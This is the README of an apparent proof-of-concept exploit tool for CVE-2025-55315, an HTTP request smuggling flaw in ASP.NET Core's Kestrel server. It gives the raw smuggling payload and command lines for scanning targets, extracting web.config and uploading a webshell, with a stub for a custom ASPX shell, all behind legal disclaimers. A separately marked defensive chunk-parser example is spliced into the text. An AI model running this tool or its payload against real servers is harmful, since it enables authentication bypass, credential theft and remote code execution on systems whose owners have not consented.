
CVE-2025-55315 PoC — ASP.NET Security Feature Bypass Vulnerability

Associated vulnerability: ASP.NET Security Feature Bypass Vulnerability (CVE-2025-55315)

Description: Inconsistent interpretation of HTTP requests ('HTTP request/response smuggling') in ASP.NET Core allows an authorized attacker to bypass a security feature over a network.

Repository description: CVE-2025-55315 PoC Exploit
# CVE-2025-55315 Pentest Tool

**HTTP Request Smuggling Exploitation Tool for ASP.NET Core Kestrel**

[![Python Version](https://img.shields.io/badge/python-3.7+-blue.svg)](https://www.python.org/downloads/)
[![CVE](https://img.shields.io/badge/CVE-2025--55315-red.svg)](https://nvd.nist.gov/vuln/detail/CVE-2025-55315)
[![CVSS](https://img.shields.io/badge/CVSS-9.9-critical.svg)](https://nvd.nist.gov/vuln/detail/CVE-2025-55315)
[![License](https://img.shields.io/badge/license-Educational%20Use-yellow.svg)](#)

---

## ⚠️ LEGAL WARNING

**THIS TOOL IS FOR AUTHORIZED SECURITY TESTING ONLY!**

- Use ONLY on systems you own or have explicit written authorization to test
- Unauthorized access to computer systems is **ILLEGAL**
- Tool creator is NOT responsible for misuse
- By using this tool, you accept full legal responsibility

---

## 📋 Overview

Professional penetration testing tool for **CVE-2025-55315** (ASP.NET Core Kestrel HTTP Request Smuggling vulnerability). This tool is designed for single-target analysis with comprehensive exploitation capabilities.

### What is CVE-2025-55315?

A **critical** HTTP Request Smuggling vulnerability in the ASP.NET Core Kestrel web server (CVSS 9.9/10) that allows attackers to:

- Bypass authentication
- Steal credentials and session tokens
- Perform Server-Side Request Forgery (SSRF)
- Poison caches
- Upload webshells and gain remote code execution

**Affected Versions:**
- .NET Core 3.0 through .NET 9.0.9
- Fixed in: .NET 8.0.21+, 9.0.10+, 10.0.0-rc2+

---

## ✨ Features

### Core Capabilities

- ✅ **Single Target Analysis** - Focused penetration testing on specific target
- ✅ **Automatic Endpoint Discovery** - Discovers common ASP.NET Core endpoints
- ✅ **Manual Endpoint Testing** - Test specific endpoints of interest
- ✅ **Vulnerability Detection** - Accurate CVE-2025-55315 detection
- ✅ **web.config Extraction** - Read configuration files via request smuggling
- ✅ **Webshell Upload** - Optional webshell deployment capability
- ✅ **Detailed Reporting** - JSON and text format reports
- ✅ **Safety Features** - Multiple confirmation prompts for destructive actions

### Technical Features

- HTTP/1.1 and HTTPS support
- Custom port support
- Configurable timeouts
- Verbose debugging mode
- Color-coded terminal output
- SSL certificate validation bypass (for testing)

---

## 🔧 Installation

### Requirements

```bash
# Python 3.7 or higher
python3 --version

# No external dependencies - uses only standard library
```

### Download

```bash
# Clone or download the tool
git clone https://github.com/ZemarKhos/CVE-2025-55315-PoC-Exploit.git
cd CVE-2025-55315-PoC-Exploit

# Make executable
chmod +x cve_2025_55315_PoC.py
```

---

## 🚀 Quick Start

### Basic Vulnerability Scan

```bash
python3 cve_2025_55315_PoC.py -t target.com
```

This will:
1. Gather server information
2. Auto-discover active endpoints
3. Test each endpoint for CVE-2025-55315
4. Display results in terminal

### Test Specific Endpoint

```bash
python3 cve_2025_55315_PoC.py -t target.com -e /api/login
```

### Full Scan with web.config Extraction

```bash
python3 cve_2025_55315_PoC.py -t target.com --read-config -o report.txt
```

### Advanced: Full Exploitation (Authorized Only!)

```bash
python3 cve_2025_55315_PoC.py \
  -t target.com \
  --read-config \
  --upload-shell \
  -v \
  -o full_report.txt
```

---

## 📖 Usage Examples

### Example 1: Quick Check

**Scenario:** Check if production server is vulnerable

```bash
python3 cve_2025_55315_PoC.py -t api.mycompany.com
```

**Expected Duration:** 30-60 seconds

---

### Example 2: Detailed Scan

**Scenario:** Comprehensive endpoint scan with verbose output

```bash
python3 cve_2025_55315_PoC.py -t api.mycompany.com -v -o scan_results.txt
```

**Expected Duration:** 2-5 minutes

---

### Example 3: Target Multiple Endpoints

**Scenario:** Test specific critical endpoints

```bash
python3 cve_2025_55315_PoC.py \
  -t api.mycompany.com \
  -e /api/payment/process \
  -e /api/admin/users \
  -e /api/internal/config \
  -o critical_endpoints.txt
```

---

### Example 4: Non-SSL Target

**Scenario:** Test internal HTTP server

```bash
python3 cve_2025_55315_PoC.py \
  -t internal-api.local \
  -p 8080 \
  --no-ssl
```

---

## 📊 Command-Line Options

```
usage: cve_2025_55315_PoC.py [-h] -t TARGET [-p PORT] [-e ENDPOINT]
                                  [--no-ssl] [--read-config] [--upload-shell]
                                  [-o OUTPUT] [-v] [--timeout TIMEOUT]

Required Arguments:
  -t, --target         Target hostname or URL (e.g., target.com)

Optional Arguments:
  -p, --port           Port number (default: 443 for SSL, 80 for non-SSL)
  -e, --endpoint       Specific endpoint(s) to test (can be used multiple times)
  --no-ssl             Disable SSL/HTTPS (use HTTP)
  --read-config        Attempt to read web.config file
  --upload-shell       Attempt webshell upload (requires confirmation)
  -o, --output         Save report to file
  -v, --verbose        Enable verbose output
  --timeout            Socket timeout in seconds (default: 10)
  -h, --help           Show help message
```

---

## 🔍 Understanding the Output

### Vulnerable System Example

```
Target: old-api.company.com:443
Vulnerable: YES - CRITICAL

--- Server Information ---
  server: Kestrel/8.0.15
  kestrel_detected: True
  http_version: 1.1

--- VULNERABLE ENDPOINTS (2) ---
  ✗ /api/login
    Details: Request smuggling successful - multiple responses
  ✗ /api/health
    Details: Request smuggling successful - multiple responses

--- SUCCESSFUL EXPLOITS ---
  ✓ web.config_read via /api/login
```

**Interpretation:**
- 🔴 **CRITICAL VULNERABILITY DETECTED**
- 🔴 Multiple endpoints are vulnerable
- 🔴 Configuration file was successfully extracted
- ⚡ **URGENT:** Update to .NET 8.0.21+ or 9.0.10+

---

### Secure System Example

```
Target: new-api.company.com:443
Vulnerable: NO - SECURE

--- Server Information ---
  server: Kestrel/9.0.10
  kestrel_detected: True
  http_version: 1.1

[SUCCESS] ✓ Endpoint NOT vulnerable (400 Bad Request)

✓ No vulnerable endpoints found - target may be patched
```

**Interpretation:**
- ✅ **SYSTEM IS SECURE**
- ✅ Running patched Kestrel version
- ✅ All malformed requests rejected

---

## 🛡️ Safety and Ethics

### Authorization Checklist

Before running this tool, ensure:

- [ ] You own the target system, OR
- [ ] You have **written** authorization to test, AND
- [ ] Security team has been notified, AND
- [ ] You have a rollback plan, AND
- [ ] You understand the legal implications

### Built-in Safety Features

1. **Two-stage confirmation** - Tool asks for authorization before starting
2. **Webshell upload confirmation** - Requires typing "YES" in capitals
3. **Rate limiting** - Delays between requests during auto-discovery
4. **Timeout protection** - Prevents hanging connections
5. **Detailed logging** - All actions are logged for audit trail

---

## 🔬 Technical Details

### Exploitation Technique

The tool exploits CVE-2025-55315 using malformed chunked transfer encoding:

```http
POST /endpoint HTTP/1.1
Host: target.com
Transfer-Encoding: chunked

2;\n          ← VULNERABILITY: Lone \n instead of \r\n
XX
0\r\n
\r\n
GET /smuggled HTTP/1.1    ← This becomes a separate request
Host: target.com
```

**Why This Works:**
1. **Proxy server** sees `\n` as line terminator → processes as single request
2. **Kestrel (vulnerable)** ignores `\n` → treats smuggled GET as separate request
3. Smuggled request may execute in another user's session context

### Detection Logic

| Server Response | Interpretation | Status |
|----------------|----------------|---------|
| `400 Bad Request` | Kestrel rejected malformed chunk | ✅ Secure (patched) |
| Multiple `HTTP/1.1` | Two separate responses received | ❌ Vulnerable |
| `500` or `502` | Internal server error | ⚠️ Likely vulnerable |
| Normal `200 OK` | Request accepted | ⚠️ Inconclusive |
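The `400 Bad Request` row above is what strict chunk framing looks like in code. The following is an added example, not the tool's code and not Kestrel's source: a parser that accepts only the CRLF framing RFC 9112 requires and reports exactly why the README's `2;\n` payload is rejected.

```python
import re
# Added example, not the tool's own code and not Kestrel's source: a strict
# chunked-body parser that behaves like the patched Kestrel in the table above.
# RFC 9112 ends chunk-size lines, chunk data and trailers with CRLF only, so a
# bare LF (the "2;\n" trick shown above) gets a 400 instead of being absorbed.

CHUNK_SIZE_LINE = re.compile(rb"[0-9A-Fa-f]+(?:;[^\r\n]*)?")

def parse_chunked(body: bytes) -> tuple[bytes, bytes]:
    """Return (decoded payload, bytes left after the final chunk) or raise ValueError."""
    pos, payload = 0, bytearray()
    while True:
        end = body.find(b"\r\n", pos)
        if end == -1:
            raise ValueError("chunk-size line not terminated by CRLF")
        line = body[pos:end]
        if b"\n" in line:
            raise ValueError("bare LF in chunk-size line")
        if not CHUNK_SIZE_LINE.fullmatch(line):
            raise ValueError(f"malformed chunk-size line {line!r}")
        size, pos = int(line.split(b";", 1)[0], 16), end + 2
        if size == 0:
            break
        if body[pos + size:pos + size + 2] != b"\r\n":
            raise ValueError("chunk data truncated or not followed by CRLF")
        payload += body[pos:pos + size]
        pos += size + 2
    while True:  # trailer section: optional "name: value" lines, then an empty line
        end = body.find(b"\r\n", pos)
        if end == -1:
            raise ValueError("trailer not terminated by CRLF")
        line, pos = body[pos:end], end + 2
        if line == b"":
            return bytes(payload), body[pos:]
        if b"\n" in line or b":" not in line:
            raise ValueError(f"malformed trailer line {line!r}")

def check_body(body: bytes) -> str:
    """Classify a body the way a strict server would: 200, or 400 with the reason."""
    try:
        payload, rest = parse_chunked(body)
    except ValueError as exc:
        return f"400 Bad Request: {exc}"
    return f"200 OK: {len(payload)} payload bytes, {len(rest)} bytes left on the connection"

# Constructed samples: the README's malformed body and a well-formed equivalent.
SMUGGLED = b"2;\nXX\r\n0\r\n\r\nGET /smuggled HTTP/1.1\r\nHost: target.com\r\n\r\n"
WELL_FORMED = b"2\r\nXX\r\n0\r\n\r\n"
```

Bytes after the final chunk are returned rather than rejected, because on a keep-alive connection they are simply the next pipelined request; what strict framing guarantees is that no part of the current body can be silently handed over to it.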

---

## 🐛 Troubleshooting

### Connection Failed

```
[ERROR] Connection failed: [Errno 111] Connection refused
```

**Solutions:**
- Verify target is reachable: `ping target.com`
- Check port number is correct
- Try with/without SSL: `--no-ssl`
- Check firewall rules

---

### SSL Certificate Error

```
[ERROR] Connection failed: certificate verify failed
```

**Solution:**
The tool already disables certificate verification. If the issue persists:

```bash
export PYTHONHTTPSVERIFY=0
python3 cve_2025_55315_PoC.py -t target.com
```

Note that `PYTHONHTTPSVERIFY` is a Python 2.7 setting (PEP 493) and is ignored by Python 3, so with Python 3 a persistent certificate error points at how the tool builds its SSL context rather than at the environment.

---

### Timeout Errors

```
[WARNING] No response - possible timeout
```

**Solutions:**
- Increase timeout: `--timeout 30`
- Check network connectivity
- Target may be slow or overloaded

---

### Upload Blocked

```
[WARNING] Upload blocked (forbidden/method not allowed)
```

**Explanation:**
- Server configuration blocks PUT/POST methods
- WAF/IPS is blocking the upload
- File permissions prevent writes

This is normal - not all vulnerable systems allow file upload.

---

## 📚 References

### CVE-2025-55315 Resources

1. **Microsoft Security Advisory:**
   https://github.com/dotnet/aspnetcore/issues/64033

2. **NVD Database:**
   https://nvd.nist.gov/vuln/detail/CVE-2025-55315

3. **Praetorian Research ($10k Bug Bounty):**
   https://www.praetorian.com/blog/how-i-found-the-worst-asp-net-vulnerability-a-10k-bug-cve-2025-55315/

4. **Andrew Lock's Technical Analysis:**
   https://andrewlock.net/understanding-the-worst-dotnet-vulnerability-request-smuggling-and-cve-2025-55315/

### HTTP Request Smuggling

5. **PortSwigger Research:**
   https://portswigger.net/web-security/request-smuggling

6. **OWASP:**
   https://owasp.org/www-community/attacks/HTTP_Request_Smuggling

---

## 🔄 Customization

### Add Custom Endpoints

Edit `COMMON_ENDPOINTS` in the script:

```python
COMMON_ENDPOINTS = [
    '/your/custom/endpoint',
    '/api/myapp/admin',
    # Add your endpoints here
]
```

### Use Custom Webshell

Modify the `upload_webshell()` method:

```python
def upload_webshell(self, endpoint: str = '/', shell_path: str = '/shell.aspx',
                   shell_content: str = None):
    if not shell_content:
        shell_content = '''
        <!-- Your custom ASPX webshell here -->
        '''
```

---

## 📝 Reporting Issues

If you find bugs or have suggestions:

1. Run with verbose mode: `-v`
2. Save full output: `-o debug.txt`
3. Include:
   - Python version
   - Command used
   - Error message
   - Expected vs actual behavior

---

## ⚖️ Legal Disclaimer

```
THIS TOOL IS PROVIDED "AS IS" FOR EDUCATIONAL AND AUTHORIZED
SECURITY TESTING PURPOSES ONLY.

THE AUTHOR(S):
❌ Do NOT endorse illegal activities
❌ Are NOT responsible for misuse
❌ Are NOT liable for any damages
❌ Do NOT provide legal advice

BY USING THIS TOOL YOU AGREE:
✅ To use only on authorized systems
✅ To accept full legal responsibility
✅ To comply with all applicable laws
✅ To follow ethical hacking principles

UNAUTHORIZED USE IS STRICTLY PROHIBITED AND ILLEGAL!
```

---

## 🎓 Educational Purpose

This tool was created for:

- Security researchers
- Penetration testers
- Bug bounty hunters
- System administrators
- Security awareness training
- Authorized security assessments

**NOT for:**

- Malicious attacks
- Unauthorized access
- Competitive reconnaissance
- Any illegal activities

---

## 🙏 Acknowledgments

- **Microsoft Security Response Center** - For CVE disclosure and patches
- **Praetorian Security** - For original vulnerability research
- **Andrew Lock** - For detailed technical analysis
- **Security community** - For responsible disclosure practices

---

## 📄 License

**Educational and Authorized Security Testing Only**

This tool is provided for educational purposes and authorized security testing. Commercial use, redistribution, or use for malicious purposes is strictly prohibited.

---

## 🔐 Final Warning

```
╔═════════════════════════════════════════════════════════════╗
║                                                             ║
║  USE THIS TOOL RESPONSIBLY AND LEGALLY!                     ║
║                                                             ║
║  Unauthorized access to computer systems is a CRIME.        ║
║  Always obtain written permission before testing.           ║
║  Follow responsible disclosure practices.                   ║
║                                                             ║
║  Happy (Legal) Hacking!                                     ║
║                                                             ║
╚═════════════════════════════════════════════════════════════╝
```

---